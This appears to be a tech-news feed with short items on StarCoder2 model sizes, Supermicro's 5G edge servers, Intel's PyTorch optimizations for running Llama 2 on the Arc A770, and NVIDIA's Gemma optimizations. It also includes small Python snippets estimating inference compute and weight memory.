StarCoder2 offers three model sizes: a 3-billion-parameter model trained by ServiceNow; a 7-billion-parameter model trained by Hugging Face; and a 15-billion-parameter model built by NVIDIA with NVIDIA NeMo and trained on NVIDIA accelerated infrastructure. The smaller variants provide powerful performance while saving on compute costs, as fewer parameters require less computing during inference. In fact, the new 3-billion-parameter model matches the performance of the original StarCoder 15-billion-parameter model. "StarCoder2 stands as a testament to the combined power of open scientific collaboration and responsible AI practices with an ethical data supply chain," emphasized Harm de Vries, lead of ServiceNow's StarCoder2 development team and co-lead of BigCode. "The state-of-the-art open-access model improves on prior generative AI performance to increase developer productivity and provides developers equal access to the benefits of code generation AI, which in turn enables organizations of any size to more easily meet their full business potential."
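The claim that fewer parameters mean less computing during inference can be quantified with a common rule of thumb for dense transformer models: generating one token costs roughly 2 floating-point operations (a multiply and an add) per parameter. The Python sketch below applies that approximation to the three nominal StarCoder2 sizes; it ignores attention costs that grow with context length, and actual parameter counts differ slightly from the rounded sizes.

```python
def forward_flops_per_token(params: float) -> float:
    """Rule-of-thumb inference cost of a dense transformer: about 2 FLOPs
    (one multiply plus one add) per parameter per token, ignoring the extra
    attention work that grows with context length."""
    return 2 * params


sizes = {"StarCoder2 3B": 3e9, "StarCoder2 7B": 7e9, "StarCoder2 15B": 15e9}
for name, params in sizes.items():
    print(f"{name}: ~{forward_flops_per_token(params) / 1e9:.0f} GFLOPs per token")

ratio = forward_flops_per_token(15e9) / forward_flops_per_token(3e9)
print(f"15B vs 3B: about {ratio:.0f}x more compute per token")
```

By this estimate, a 3B model that matches the original 15B StarCoder delivers similar results for about one fifth of the per-token compute.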

Supermicro Accelerates Performance of 5G and Telco Cloud Workloads with New and Expanded Portfolio of Infrastructure Solutions

Supermicro, Inc. (NASDAQ: SMCI), a Total IT Solution Provider for AI, Cloud, Storage, and 5G/Edge, delivers an expanded portfolio of purpose-built infrastructure solutions to accelerate performance and increase efficiency in 5G and telecom workloads. With one of the industry's most diverse offerings, Supermicro enables customers to expand public and private 5G infrastructures with improved performance per watt and support for new and innovative AI applications. As a long-term advocate of open networking platforms and a member of the O-RAN Alliance, Supermicro's portfolio incorporates systems featuring 5th Gen Intel Xeon processors, AMD EPYC 8004 Series processors, and the NVIDIA Grace Hopper Superchip.

"Supermicro is expanding our broad portfolio of sustainable and state-of-the-art servers to address the demanding requirements of 5G and telco markets and Edge AI," said Charles Liang, president and CEO of Supermicro. "Our products are not just about technology, they are about delivering tangible customer benefits. We quickly bring data center AI capabilities to the network's edge using our Building Block architecture. Our products enable operators to offer new capabilities to their customers with improved performance and lower energy consumption. Our edge servers contain up to 2 TB of high-speed DDR5 memory, 6 PCIe slots, and a range of networking options. These systems are designed for increased power efficiency and performance-per-watt, enabling operators to create high-performance, customized solutions for their unique requirements. This reassures our customers that they are investing in reliable and efficient solutions."

Intel Optimizes PyTorch for Llama 2 on Arc A770, Higher Precision FP16

Intel just announced optimizations for PyTorch (IPEX) to take advantage of the AI acceleration features of its Arc "Alchemist" GPUs. PyTorch is a popular machine learning library that is often associated with NVIDIA GPUs, but it is actually platform-agnostic. It can be run on a variety of hardware, including CPUs and GPUs. However, performance may not be optimal without specific optimizations. Intel offers such optimizations through the Intel Extension for PyTorch (IPEX), which extends PyTorch with optimizations specifically designed for Intel's compute hardware.

Intel released a blog post detailing how to run Meta AI's Llama 2 large language model on its Arc "Alchemist" A770 graphics card. The model requires 14 GB of GPU RAM, so the 16 GB version of the A770 is recommended. This development could be seen as a direct response to NVIDIA's Chat with RTX tool, which allows GeForce users with RTX 30-series "Ampere" and RTX 40-series "Ada" GPUs carrying 8 GB or more of VRAM to run TensorRT-LLM models on their graphics cards. NVIDIA achieves lower VRAM usage by distributing INT4-quantized versions of the models, while Intel uses a higher-precision FP16 version. In theory, this difference in precision should not have a significant impact on output quality. Intel's blog post provides instructions on how to set up Llama 2 inference with PyTorch (IPEX) on the A770.
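The 14 GB figure and the VRAM gap between the two approaches follow from bytes per weight. The Python estimate below assumes the 7-billion-parameter Llama 2 variant (the article does not name the size, but 14 GB matches 7 billion parameters at two bytes each) and counts weights only, so actual VRAM use is higher once the KV cache and runtime overhead are added.

```python
def weight_memory_gb(params_billion: float, bits_per_weight: float) -> float:
    """Approximate size of the model weights alone, in decimal gigabytes.

    Ignores the KV cache, activations and framework overhead, so real VRAM
    use is higher.
    """
    total_bytes = params_billion * 1e9 * bits_per_weight / 8
    return total_bytes / 1e9


for label, bits in (("FP16", 16), ("INT4", 4)):
    print(f"Llama 2 7B @ {label}: ~{weight_memory_gb(7, bits):.1f} GB")
```

At FP16 the weights alone fill most of a 16 GB A770, while an INT4 copy of the same model fits comfortably within the 8 GB minimum NVIDIA sets for Chat with RTX.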

Google's Gemma Optimized to Run on NVIDIA GPUs, Gemma Coming to Chat with RTX

NVIDIA, in collaboration with Google, today launched optimizations across all NVIDIA AI platforms for Gemma—Google's state-of-the-art new lightweight 2 billion- and 7 billion-parameter open language models that can be run anywhere, reducing costs and speeding innovative work for domain-specific use cases.

Teams from the companies worked closely together to accelerate the performance of Gemma—built from the same research and technology used to create the Gemini models—with NVIDIA TensorRT-LLM, an open-source library for optimizing large language model inference, when running on NVIDIA GPUs in the data center, in the cloud and on PCs with NVIDIA RTX GPUs. This allows developers to target the installed base of over 100 million NVIDIA RTX GPUs available in high-performance AI PCs globally.
May 1st, 2024 02:15 EDT
